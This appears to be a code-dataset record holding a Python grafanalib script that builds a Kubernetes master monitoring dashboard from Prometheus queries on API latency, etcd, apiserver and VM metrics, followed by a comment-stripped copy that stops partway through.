hexsha
stringlengths 40
40
| size
int64 2
1.02M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
245
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
245
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 2
1.02M
| avg_line_length
float64 1
417k
| max_line_length
int64 1
987k
| alphanum_fraction
float64 0
1
| content_no_comment
stringlengths 0
1.01M
| is_comment_constant_removed
bool 1
class | is_sharp_comment_removed
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f70596fbe9596e1848acaad7aac1ea065663307c
| 20,363
|
py
|
Python
|
clusterloader2/pkg/prometheus/manifests/dashboards/master-dashboard.dashboard.py
|
ruquanzhao/perf-tests
|
e63056acb9ae69d2d0bf6449039b0dfda55d129f
|
[
"Apache-2.0"
] | 1
|
2021-06-17T07:19:59.000Z
|
2021-06-17T07:19:59.000Z
|
clusterloader2/pkg/prometheus/manifests/dashboards/master-dashboard.dashboard.py
|
yangjunmyfm192085/perf-tests
|
432229eeb3f74027eab9865ae0eb02078f50238f
|
[
"Apache-2.0"
] | null | null | null |
clusterloader2/pkg/prometheus/manifests/dashboards/master-dashboard.dashboard.py
|
yangjunmyfm192085/perf-tests
|
432229eeb3f74027eab9865ae0eb02078f50238f
|
[
"Apache-2.0"
] | 4
|
2021-01-29T08:31:11.000Z
|
2021-06-14T06:08:32.000Z
|
#!/usr/bin/env python3
# Copyright 2019 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from grafanalib import core as g
import defaults as d
def api_call_latency_panel(expression):
def api_call_latency(title, verb, scope, threshold):
return d.Graph(
title=title,
targets=[
g.Target(expr=str(threshold), legendFormat="threshold"),
g.Target(
expr=d.one_line(expression % {"verb": verb, "scope": scope}
),
# TODO(github.com/grafana/grafana/issues/19410): uncomment once fixed
# legendFormat="{{verb}} {{scope}}/{{resource}}",
),
],
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
)
return [
api_call_latency(
title="GET resource latency (percentaile=99, scope=resource, threshold=1s)",
verb="GET",
scope="resource",
threshold=1,
),
api_call_latency(
title="LIST namespace latency (percentaile=99, scope=namespace, threshold=5s)",
verb="LIST",
scope="namespace",
threshold=5,
),
api_call_latency(
title="LIST cluster latency (percentaile=99, scope=cluster, threshold=30s)",
verb="LIST",
scope="cluster",
threshold=30,
),
api_call_latency(
title="Mutating API call latency (threshold=1s)",
verb=d.any_of("CREATE", "DELETE", "PATCH", "POST", "PUT"),
scope=d.any_of("namespace", "cluster", "resource"),
threshold=1,
),
]
API_CALL_LATENCY_PANELS = api_call_latency_panel("""
apiserver:apiserver_request_latency_1m:histogram_quantile{
quantile="0.99",
verb=~"%(verb)s",
scope=~"%(scope)s",
resource=~"${resource:regex}s*",
subresource!~"exec|proxy",
}""")
QUANTILE_API_CALL_LATENCY_PANELS = api_call_latency_panel("""
quantile_over_time(0.99,
apiserver:apiserver_request_latency_1m:histogram_quantile{
quantile="0.99",
verb=~"%(verb)s",
scope=~"%(scope)s",
resource=~"${resource:regex}s*",
subresource!~"exec|proxy",
}[5d])""")
PAF_PANELS = [
d.simple_graph(
"Requests waiting time",
"histogram_quantile(0.99, sum(rate(apiserver_flowcontrol_request_wait_duration_seconds_bucket[1m])) by (le, priority_level))",
legend="{{priority_level}}",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph(
"Execution time",
"histogram_quantile(0.99, sum(rate(apiserver_flowcontrol_request_execution_seconds_bucket[1m])) by (le, priority_level))",
legend="{{priority_level}}",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph(
"Total execution time per second",
"sum(irate(apiserver_flowcontrol_request_execution_seconds_sum[1m])) by (priority_level)",
legend="{{priority_level}}",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph(
"Requests rate by priority level",
"sum(irate(apiserver_flowcontrol_dispatched_requests_total[1m])) by (priority_level)",
legend="{{priority_level}}",
yAxes=g.single_y_axis(format=g.OPS_FORMAT),
),
d.simple_graph(
"Concurrency limits",
"avg(apiserver_flowcontrol_request_concurrency_limit) by (priority_level)",
legend="{{priority_level}}",
),
]
HEALTH_PANELS = [
d.simple_graph(
"Unhealthy nodes",
"sum(node_collector_unhealthy_nodes_in_zone) by (zone)",
legend="{{zone}}",
),
d.simple_graph(
"Pod creations",
'sum(irate(apiserver_request_total{verb="POST", resource="pods", subresource=""}[1m]))',
yAxes=g.single_y_axis(format=g.OPS_FORMAT),
),
d.simple_graph(
"Pod bindings",
'sum(irate(apiserver_request_total{verb="POST", resource="pods", subresource="binding"}[1m]))',
yAxes=g.single_y_axis(format=g.OPS_FORMAT),
),
# It's not clear which "Component restarts" shows more accurate results.
d.simple_graph(
"Component restarts",
"sum(rate(process_start_time_seconds[1m]) > bool 0) by (job, endpoint)",
),
d.simple_graph(
"Component restarts 2",
'sum(min_over_time(container_start_time_seconds{container!="",container!="POD"}[2m])) by (container)',
),
d.simple_graph(
"Active component", "sum(leader_election_master_status) by (name, instance)"
),
]
ETCD_PANELS = [
d.simple_graph("etcd leader", "etcd_server_is_leader", legend="{{instance}}"),
d.simple_graph(
"etcd bytes sent",
"rate(etcd_network_client_grpc_sent_bytes_total[1m])",
yAxes=g.single_y_axis(format=g.BYTES_PER_SEC_FORMAT),
legend="{{instance}}",
),
d.simple_graph(
"etcd operations rate",
d.one_line(
"""
sum(
rate(
etcd_request_duration_seconds_count{
operation=~"${etcd_operation:regex}",
type=~".*(${etcd_type:pipe})"
}[1m]
)
) by (operation, type)
"""
),
yAxes=g.single_y_axis(format=g.OPS_FORMAT),
legend="{{operation}} {{type}}",
),
d.simple_graph(
"etcd get latency by type (99th percentile)",
d.one_line(
"""
histogram_quantile(
0.99,
sum(
rate(
etcd_request_duration_seconds_bucket{
operation=~"${etcd_operation:regex}",
type=~".*(${etcd_type:pipe})"
}[1m]
)
) by (le, operation, type, instance)
)
"""
),
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
legend="{{operation}} {{type}} on {{instance}}",
),
d.simple_graph(
"etcd get latency by type (50th percentile)",
d.one_line(
"""
histogram_quantile(
0.50,
sum(
rate(
etcd_request_duration_seconds_bucket{
operation=~"${etcd_operation:regex}",
type=~".*(${etcd_type:pipe})"
}[1m]
)
) by (le, operation, type, instance)
)
"""
),
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph("etcd instance id", "sum(etcd_server_id) by (instance, server_id)"),
d.simple_graph(
"etcd network latency (99th percentile)",
"histogram_quantile(0.99, sum(rate(etcd_network_peer_round_trip_time_seconds_bucket[1m])) by (le, instance, To))",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph(
"etcd compaction keys",
"delta(etcd_debugging_mvcc_db_compaction_keys_total[1m])",
),
d.simple_graph(
"etcd compaction pause sum duration",
"delta(etcd_debugging_mvcc_db_compaction_pause_duration_milliseconds_sum[1m])",
yAxes=g.single_y_axis(format=g.MILLISECONDS_FORMAT),
),
d.simple_graph(
"etcd compaction pause num chunks",
"delta(etcd_debugging_mvcc_db_compaction_pause_duration_milliseconds_count[1m])",
),
d.simple_graph(
"etcd_disk_backend_commit_duration_seconds",
"histogram_quantile(0.99, sum(rate(etcd_disk_backend_commit_duration_seconds_bucket[1m])) by (le, instance))",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph(
"etcd wal fsync duration",
"histogram_quantile(1.0, sum(rate(etcd_disk_wal_fsync_duration_seconds_bucket[1m])) by (le, endpoint))",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.Graph(
title="etcd compaction max pause",
points=True,
lines=False,
targets=[
g.Target(
expr="histogram_quantile(1.0, sum(rate(etcd_debugging_mvcc_db_compaction_pause_duration_milliseconds_bucket[1m])) by (le, instance))"
)
],
yAxes=g.single_y_axis(format=g.MILLISECONDS_FORMAT),
),
d.simple_graph(
"etcd objects",
"sum(etcd_object_counts) by (resource, instance)",
legend="{{instance}}: {{resource}}",
),
d.simple_graph(
"etcd db size",
[
"etcd_mvcc_db_total_size_in_bytes",
"etcd_mvcc_db_total_size_in_use_in_bytes",
"etcd_server_quota_backend_bytes",
],
yAxes=g.single_y_axis(format=g.BYTES_FORMAT),
),
]
APISERVER_PANELS = [
d.simple_graph(
"goroutines",
'go_goroutines{job="master", endpoint="apiserver"}',
legend="{{instance}}",
),
d.simple_graph(
"gc rate",
'rate(go_gc_duration_seconds_count{job="master", endpoint="apiserver"}[1m])',
legend="{{instance}}",
),
d.simple_graph(
"alloc rate",
'rate(go_memstats_alloc_bytes_total{job="master", endpoint="apiserver"}[1m])',
yAxes=g.single_y_axis(format=g.BYTES_PER_SEC_FORMAT),
legend="{{instance}}",
),
d.simple_graph(
"Number of active watches",
'sum(apiserver_registered_watchers{kind=~"(?i:(${resource:regex}))s*"}) by (instance, group, version, kind)',
legend="{{instance}}: {{version}}.{{group}}.{{kind}}",
),
d.simple_graph(
"Watch events rate",
d.one_line(
"""
sum(
irate(
apiserver_watch_events_total{
kind=~"(?i:(${resource:regex}))s*"
}[1m]
)
) by (instance, group, version, kind)"""
),
legend="{{instance}}: {{version}}.{{group}}.{{kind}}",
),
d.simple_graph(
"Watch events traffic",
d.one_line(
"""
sum(
irate(
apiserver_watch_events_sizes_sum{
kind=~"(?i:(${resource:regex}))s*"
}[1m]
)
) by (instance, group, version, kind)"""
),
yAxes=g.single_y_axis(format=g.BYTES_PER_SEC_FORMAT),
legend="{{instance}}: {{version}}.{{group}}.{{kind}}",
),
d.simple_graph(
"Watch event avg size",
d.one_line(
"""
sum(
rate(
apiserver_watch_events_sizes_sum{
kind=~"(?i:(${resource:regex}))s*"
}[1m]
)
/
rate(
apiserver_watch_events_sizes_count{
kind=~"(?i:(${resource:regex}))s*"
}[1m]
)
) by (instance, group, version, kind)"""
),
legend="{{instance}}: {{version}}.{{group}}.{{kind}}",
),
d.simple_graph(
"Inflight requests",
"sum(apiserver_current_inflight_requests) by (requestKind, instance)",
legend="{{instance}}: {{requestKind}}",
),
d.simple_graph(
"Request rate",
d.one_line(
"""
sum(
rate(
apiserver_request_total{
verb=~"${verb:regex}",
resource=~"${resource:regex}s*"
}[1m]
)
) by (verb, resource, subresource, instance)"""
),
# TODO(github.com/grafana/grafana/issues/19410): uncomment once fixed
# legend="{{instance}}: {{verb}} {{resource}}",
),
d.simple_graph(
"Request rate by code",
"sum(rate(apiserver_request_total[1m])) by (code, instance)",
legend="{{instance}}: {{code}}",
),
d.simple_graph(
"Request latency (50th percentile) (excl. WATCH)",
d.one_line(
"""
apiserver:apiserver_request_latency:histogram_quantile{
quantile="0.50",
verb!="WATCH",
verb=~"${verb:regex}",
resource=~"${resource:regex}s*"
}"""
),
# TODO(github.com/grafana/grafana/issues/19410): uncomment once fixed
# legend="{{verb}} {{scope}}/{{resource}}",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph(
"Request latency (99th percentile) (excl. WATCH)",
d.one_line(
"""
apiserver:apiserver_request_latency:histogram_quantile{
quantile="0.99",
verb!="WATCH",
verb=~"${verb:regex}",
resource=~"${resource:regex}s*"
}"""
),
# TODO(github.com/grafana/grafana/issues/19410): uncomment once fixed
# legend="{{verb}} {{scope}}/{{resource}}",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph(
"Traffic (excl. WATCH)",
d.one_line(
"""
sum(
rate(
apiserver_response_sizes_sum{
verb!="WATCH",
verb=~"${verb:regex}",
resource=~"${resource:regex}s*"
}[1m]
)
) by (verb, version, resource, subresource, scope, instance)"""
),
yAxes=g.single_y_axis(format=g.BYTES_PER_SEC_FORMAT),
),
d.simple_graph(
"Webhook admission duration (99th percentile)",
"histogram_quantile(0.99, sum(rate(apiserver_admission_webhook_admission_duration_seconds_bucket[1m])) by (le, type, name))",
legend="{{type}}: {{name}}",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph(
"Request filter latency for each filter type (99th percentile)",
"histogram_quantile(0.99, sum(rate(apiserver_request_filter_duration_seconds_bucket[1m])) by (le, filter))",
legend="{{filter}}",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
]
VM_PANELS = [
d.simple_graph(
"fs bytes reads by container",
"sum(rate(container_fs_reads_bytes_total[1m])) by (container, instance)",
legend="{{instance}}: {{container}}",
yAxes=g.single_y_axis(format=g.BYTES_FORMAT),
),
d.simple_graph(
"fs reads by container",
"sum(rate(container_fs_reads_total[1m])) by (container, instance)",
legend="{{instance}}: {{container}}",
),
d.simple_graph(
"fs bytes writes by container",
"sum(rate(container_fs_writes_bytes_total[1m])) by (container, instance)",
legend="{{instance}}: {{container}}",
yAxes=g.single_y_axis(format=g.BYTES_FORMAT),
),
d.simple_graph(
"fs writes by container",
"sum(rate(container_fs_writes_total[1m])) by (container, instance)",
legend="{{instance}}: {{container}}",
),
d.Graph(
title="CPU usage by container",
targets=[
d.Target(
expr='sum(rate(container_cpu_usage_seconds_total{container!=""}[1m])) by (container, instance)',
legendFormat="{{instance}}: {{container}}",
),
d.Target(expr="machine_cpu_cores", legendFormat="limit"),
],
),
d.Graph(
title="memory usage by container",
targets=[
d.Target(
expr='sum(container_memory_usage_bytes{container!=""}) by (container, instance)',
legendFormat="{{instance}}: {{container}}",
),
d.Target(expr="machine_memory_bytes", legendFormat="limit"),
],
yAxes=g.single_y_axis(format=g.BYTES_FORMAT),
),
d.Graph(
title="memory working set by container",
targets=[
d.Target(
expr='sum(container_memory_working_set_bytes{container!=""}) by (container, instance)',
legendFormat="{{instance}}: {{container}}",
),
d.Target(expr="machine_memory_bytes", legendFormat="limit"),
],
yAxes=g.single_y_axis(format=g.BYTES_FORMAT),
),
d.Graph(
title="Network usage (bytes)",
targets=[
g.Target(
expr='rate(container_network_transmit_bytes_total{id="/"}[1m])',
legendFormat="{{instance}} transmit",
),
g.Target(
expr='rate(container_network_receive_bytes_total{id="/"}[1m])',
legendFormat="{{instance}} receive",
),
],
yAxes=g.single_y_axis(format=g.BYTES_PER_SEC_FORMAT),
),
d.Graph(
title="Network usage (packets)",
targets=[
g.Target(
expr='rate(container_network_transmit_packets_total{id="/"}[1m])',
legendFormat="{{instance}} transmit",
),
g.Target(
expr='rate(container_network_receive_packets_total{id="/"}[1m])',
legendFormat="{{instance}} receive",
),
],
),
d.Graph(
title="Network usage (avg packet size)",
targets=[
g.Target(
expr='rate(container_network_transmit_bytes_total{id="/"}[1m]) / rate(container_network_transmit_packets_total{id="/"}[1m])',
legendFormat="{{instance}} transmit",
),
g.Target(
expr='rate(container_network_receive_bytes_total{id="/"}[1m]) / rate(container_network_receive_packets_total{id="/"}[1m])',
legendFormat="{{instance}} receive",
),
],
yAxes=g.single_y_axis(format=g.BYTES_FORMAT),
),
d.Graph(
title="Network tcp segments",
targets=[
g.Target(
expr="sum(rate(node_netstat_Tcp_InSegs[1m])) by (instance)",
legendFormat="InSegs {{instance}}",
),
g.Target(
expr="sum(rate(node_netstat_Tcp_OutSegs[1m])) by (instance)",
legendFormat="OutSegs {{instance}}",
),
g.Target(
expr="sum(rate(node_netstat_Tcp_RetransSegs[1m])) by (instance)",
legendFormat="RetransSegs {{instance}}",
),
],
yAxes=g.single_y_axis(format=g.SHORT_FORMAT, logBase=10),
),
]
# The final dashboard must be named 'dashboard' so that grafanalib will find it.
dashboard = d.Dashboard(
title="Master dashboard",
refresh="",
rows=[
d.Row(title="API call latency", panels=API_CALL_LATENCY_PANELS),
d.Row(title="API call latency aggregated with quantile", panels=QUANTILE_API_CALL_LATENCY_PANELS, collapse=True),
d.Row(title="P&F metrics", panels=PAF_PANELS, collapse=True),
d.Row(title="Overall cluster health", panels=HEALTH_PANELS, collapse=True),
d.Row(title="etcd", panels=ETCD_PANELS, collapse=True),
d.Row(title="kube-apiserver", panels=APISERVER_PANELS, collapse=True),
d.Row(
title="kube-controller-manager",
panels=[
d.simple_graph(
"Workqueue depths",
'workqueue_depth{endpoint="kube-controller-manager"}',
legend="{{name}}",
)
],
collapse=True,
),
d.Row(title="Master VM", panels=VM_PANELS, collapse=True),
],
templating=g.Templating(
list=[
d.SOURCE_TEMPLATE,
g.Template(
name="etcd_type",
type="query",
dataSource="$source",
regex=r"\*\[+\]+(.*)",
query="label_values(etcd_request_duration_seconds_count, type)",
multi=True,
includeAll=True,
refresh=g.REFRESH_ON_TIME_RANGE_CHANGE,
),
g.Template(
name="etcd_operation",
type="query",
dataSource="$source",
query="label_values(etcd_request_duration_seconds_count, operation)",
multi=True,
includeAll=True,
refresh=g.REFRESH_ON_TIME_RANGE_CHANGE,
),
g.Template(
name="verb",
type="query",
dataSource="$source",
query="label_values(apiserver_request_duration_seconds_count, verb)",
multi=True,
includeAll=True,
refresh=g.REFRESH_ON_TIME_RANGE_CHANGE,
),
g.Template(
name="resource",
type="query",
dataSource="$source",
regex="(.*)s",
query="label_values(apiserver_request_duration_seconds_count, resource)",
multi=True,
includeAll=True,
refresh=g.REFRESH_ON_TIME_RANGE_CHANGE,
),
]
),
).auto_panel_ids()
| 33.60231
| 149
| 0.582282
|
from grafanalib import core as g
import defaults as d
def api_call_latency_panel(expression):
def api_call_latency(title, verb, scope, threshold):
return d.Graph(
title=title,
targets=[
g.Target(expr=str(threshold), legendFormat="threshold"),
g.Target(
expr=d.one_line(expression % {"verb": verb, "scope": scope}
),
),
],
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
)
return [
api_call_latency(
title="GET resource latency (percentaile=99, scope=resource, threshold=1s)",
verb="GET",
scope="resource",
threshold=1,
),
api_call_latency(
title="LIST namespace latency (percentaile=99, scope=namespace, threshold=5s)",
verb="LIST",
scope="namespace",
threshold=5,
),
api_call_latency(
title="LIST cluster latency (percentaile=99, scope=cluster, threshold=30s)",
verb="LIST",
scope="cluster",
threshold=30,
),
api_call_latency(
title="Mutating API call latency (threshold=1s)",
verb=d.any_of("CREATE", "DELETE", "PATCH", "POST", "PUT"),
scope=d.any_of("namespace", "cluster", "resource"),
threshold=1,
),
]
API_CALL_LATENCY_PANELS = api_call_latency_panel("""
apiserver:apiserver_request_latency_1m:histogram_quantile{
quantile="0.99",
verb=~"%(verb)s",
scope=~"%(scope)s",
resource=~"${resource:regex}s*",
subresource!~"exec|proxy",
}""")
QUANTILE_API_CALL_LATENCY_PANELS = api_call_latency_panel("""
quantile_over_time(0.99,
apiserver:apiserver_request_latency_1m:histogram_quantile{
quantile="0.99",
verb=~"%(verb)s",
scope=~"%(scope)s",
resource=~"${resource:regex}s*",
subresource!~"exec|proxy",
}[5d])""")
PAF_PANELS = [
d.simple_graph(
"Requests waiting time",
"histogram_quantile(0.99, sum(rate(apiserver_flowcontrol_request_wait_duration_seconds_bucket[1m])) by (le, priority_level))",
legend="{{priority_level}}",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph(
"Execution time",
"histogram_quantile(0.99, sum(rate(apiserver_flowcontrol_request_execution_seconds_bucket[1m])) by (le, priority_level))",
legend="{{priority_level}}",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph(
"Total execution time per second",
"sum(irate(apiserver_flowcontrol_request_execution_seconds_sum[1m])) by (priority_level)",
legend="{{priority_level}}",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph(
"Requests rate by priority level",
"sum(irate(apiserver_flowcontrol_dispatched_requests_total[1m])) by (priority_level)",
legend="{{priority_level}}",
yAxes=g.single_y_axis(format=g.OPS_FORMAT),
),
d.simple_graph(
"Concurrency limits",
"avg(apiserver_flowcontrol_request_concurrency_limit) by (priority_level)",
legend="{{priority_level}}",
),
]
HEALTH_PANELS = [
d.simple_graph(
"Unhealthy nodes",
"sum(node_collector_unhealthy_nodes_in_zone) by (zone)",
legend="{{zone}}",
),
d.simple_graph(
"Pod creations",
'sum(irate(apiserver_request_total{verb="POST", resource="pods", subresource=""}[1m]))',
yAxes=g.single_y_axis(format=g.OPS_FORMAT),
),
d.simple_graph(
"Pod bindings",
'sum(irate(apiserver_request_total{verb="POST", resource="pods", subresource="binding"}[1m]))',
yAxes=g.single_y_axis(format=g.OPS_FORMAT),
),
d.simple_graph(
"Component restarts",
"sum(rate(process_start_time_seconds[1m]) > bool 0) by (job, endpoint)",
),
d.simple_graph(
"Component restarts 2",
'sum(min_over_time(container_start_time_seconds{container!="",container!="POD"}[2m])) by (container)',
),
d.simple_graph(
"Active component", "sum(leader_election_master_status) by (name, instance)"
),
]
ETCD_PANELS = [
d.simple_graph("etcd leader", "etcd_server_is_leader", legend="{{instance}}"),
d.simple_graph(
"etcd bytes sent",
"rate(etcd_network_client_grpc_sent_bytes_total[1m])",
yAxes=g.single_y_axis(format=g.BYTES_PER_SEC_FORMAT),
legend="{{instance}}",
),
d.simple_graph(
"etcd operations rate",
d.one_line(
"""
sum(
rate(
etcd_request_duration_seconds_count{
operation=~"${etcd_operation:regex}",
type=~".*(${etcd_type:pipe})"
}[1m]
)
) by (operation, type)
"""
),
yAxes=g.single_y_axis(format=g.OPS_FORMAT),
legend="{{operation}} {{type}}",
),
d.simple_graph(
"etcd get latency by type (99th percentile)",
d.one_line(
"""
histogram_quantile(
0.99,
sum(
rate(
etcd_request_duration_seconds_bucket{
operation=~"${etcd_operation:regex}",
type=~".*(${etcd_type:pipe})"
}[1m]
)
) by (le, operation, type, instance)
)
"""
),
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
legend="{{operation}} {{type}} on {{instance}}",
),
d.simple_graph(
"etcd get latency by type (50th percentile)",
d.one_line(
"""
histogram_quantile(
0.50,
sum(
rate(
etcd_request_duration_seconds_bucket{
operation=~"${etcd_operation:regex}",
type=~".*(${etcd_type:pipe})"
}[1m]
)
) by (le, operation, type, instance)
)
"""
),
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph("etcd instance id", "sum(etcd_server_id) by (instance, server_id)"),
d.simple_graph(
"etcd network latency (99th percentile)",
"histogram_quantile(0.99, sum(rate(etcd_network_peer_round_trip_time_seconds_bucket[1m])) by (le, instance, To))",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph(
"etcd compaction keys",
"delta(etcd_debugging_mvcc_db_compaction_keys_total[1m])",
),
d.simple_graph(
"etcd compaction pause sum duration",
"delta(etcd_debugging_mvcc_db_compaction_pause_duration_milliseconds_sum[1m])",
yAxes=g.single_y_axis(format=g.MILLISECONDS_FORMAT),
),
d.simple_graph(
"etcd compaction pause num chunks",
"delta(etcd_debugging_mvcc_db_compaction_pause_duration_milliseconds_count[1m])",
),
d.simple_graph(
"etcd_disk_backend_commit_duration_seconds",
"histogram_quantile(0.99, sum(rate(etcd_disk_backend_commit_duration_seconds_bucket[1m])) by (le, instance))",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph(
"etcd wal fsync duration",
"histogram_quantile(1.0, sum(rate(etcd_disk_wal_fsync_duration_seconds_bucket[1m])) by (le, endpoint))",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.Graph(
title="etcd compaction max pause",
points=True,
lines=False,
targets=[
g.Target(
expr="histogram_quantile(1.0, sum(rate(etcd_debugging_mvcc_db_compaction_pause_duration_milliseconds_bucket[1m])) by (le, instance))"
)
],
yAxes=g.single_y_axis(format=g.MILLISECONDS_FORMAT),
),
d.simple_graph(
"etcd objects",
"sum(etcd_object_counts) by (resource, instance)",
legend="{{instance}}: {{resource}}",
),
d.simple_graph(
"etcd db size",
[
"etcd_mvcc_db_total_size_in_bytes",
"etcd_mvcc_db_total_size_in_use_in_bytes",
"etcd_server_quota_backend_bytes",
],
yAxes=g.single_y_axis(format=g.BYTES_FORMAT),
),
]
APISERVER_PANELS = [
d.simple_graph(
"goroutines",
'go_goroutines{job="master", endpoint="apiserver"}',
legend="{{instance}}",
),
d.simple_graph(
"gc rate",
'rate(go_gc_duration_seconds_count{job="master", endpoint="apiserver"}[1m])',
legend="{{instance}}",
),
d.simple_graph(
"alloc rate",
'rate(go_memstats_alloc_bytes_total{job="master", endpoint="apiserver"}[1m])',
yAxes=g.single_y_axis(format=g.BYTES_PER_SEC_FORMAT),
legend="{{instance}}",
),
d.simple_graph(
"Number of active watches",
'sum(apiserver_registered_watchers{kind=~"(?i:(${resource:regex}))s*"}) by (instance, group, version, kind)',
legend="{{instance}}: {{version}}.{{group}}.{{kind}}",
),
d.simple_graph(
"Watch events rate",
d.one_line(
"""
sum(
irate(
apiserver_watch_events_total{
kind=~"(?i:(${resource:regex}))s*"
}[1m]
)
) by (instance, group, version, kind)"""
),
legend="{{instance}}: {{version}}.{{group}}.{{kind}}",
),
d.simple_graph(
"Watch events traffic",
d.one_line(
"""
sum(
irate(
apiserver_watch_events_sizes_sum{
kind=~"(?i:(${resource:regex}))s*"
}[1m]
)
) by (instance, group, version, kind)"""
),
yAxes=g.single_y_axis(format=g.BYTES_PER_SEC_FORMAT),
legend="{{instance}}: {{version}}.{{group}}.{{kind}}",
),
d.simple_graph(
"Watch event avg size",
d.one_line(
"""
sum(
rate(
apiserver_watch_events_sizes_sum{
kind=~"(?i:(${resource:regex}))s*"
}[1m]
)
/
rate(
apiserver_watch_events_sizes_count{
kind=~"(?i:(${resource:regex}))s*"
}[1m]
)
) by (instance, group, version, kind)"""
),
legend="{{instance}}: {{version}}.{{group}}.{{kind}}",
),
d.simple_graph(
"Inflight requests",
"sum(apiserver_current_inflight_requests) by (requestKind, instance)",
legend="{{instance}}: {{requestKind}}",
),
d.simple_graph(
"Request rate",
d.one_line(
"""
sum(
rate(
apiserver_request_total{
verb=~"${verb:regex}",
resource=~"${resource:regex}s*"
}[1m]
)
) by (verb, resource, subresource, instance)"""
),
# TODO(github.com/grafana/grafana/issues/19410): uncomment once fixed
# legend="{{instance}}: {{verb}} {{resource}}",
),
d.simple_graph(
"Request rate by code",
"sum(rate(apiserver_request_total[1m])) by (code, instance)",
legend="{{instance}}: {{code}}",
),
d.simple_graph(
"Request latency (50th percentile) (excl. WATCH)",
d.one_line(
"""
apiserver:apiserver_request_latency:histogram_quantile{
quantile="0.50",
verb!="WATCH",
verb=~"${verb:regex}",
resource=~"${resource:regex}s*"
}"""
),
# TODO(github.com/grafana/grafana/issues/19410): uncomment once fixed
# legend="{{verb}} {{scope}}/{{resource}}",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph(
"Request latency (99th percentile) (excl. WATCH)",
d.one_line(
"""
apiserver:apiserver_request_latency:histogram_quantile{
quantile="0.99",
verb!="WATCH",
verb=~"${verb:regex}",
resource=~"${resource:regex}s*"
}"""
),
# TODO(github.com/grafana/grafana/issues/19410): uncomment once fixed
# legend="{{verb}} {{scope}}/{{resource}}",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph(
"Traffic (excl. WATCH)",
d.one_line(
"""
sum(
rate(
apiserver_response_sizes_sum{
verb!="WATCH",
verb=~"${verb:regex}",
resource=~"${resource:regex}s*"
}[1m]
)
) by (verb, version, resource, subresource, scope, instance)"""
),
yAxes=g.single_y_axis(format=g.BYTES_PER_SEC_FORMAT),
),
d.simple_graph(
"Webhook admission duration (99th percentile)",
"histogram_quantile(0.99, sum(rate(apiserver_admission_webhook_admission_duration_seconds_bucket[1m])) by (le, type, name))",
legend="{{type}}: {{name}}",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
d.simple_graph(
"Request filter latency for each filter type (99th percentile)",
"histogram_quantile(0.99, sum(rate(apiserver_request_filter_duration_seconds_bucket[1m])) by (le, filter))",
legend="{{filter}}",
yAxes=g.single_y_axis(format=g.SECONDS_FORMAT),
),
]
VM_PANELS = [
d.simple_graph(
"fs bytes reads by container",
"sum(rate(container_fs_reads_bytes_total[1m])) by (container, instance)",
legend="{{instance}}: {{container}}",
yAxes=g.single_y_axis(format=g.BYTES_FORMAT),
),
d.simple_graph(
"fs reads by container",
"sum(rate(container_fs_reads_total[1m])) by (container, instance)",
legend="{{instance}}: {{container}}",
),
d.simple_graph(
"fs bytes writes by container",
"sum(rate(container_fs_writes_bytes_total[1m])) by (container, instance)",
legend="{{instance}}: {{container}}",
yAxes=g.single_y_axis(format=g.BYTES_FORMAT),
),
d.simple_graph(
"fs writes by container",
"sum(rate(container_fs_writes_total[1m])) by (container, instance)",
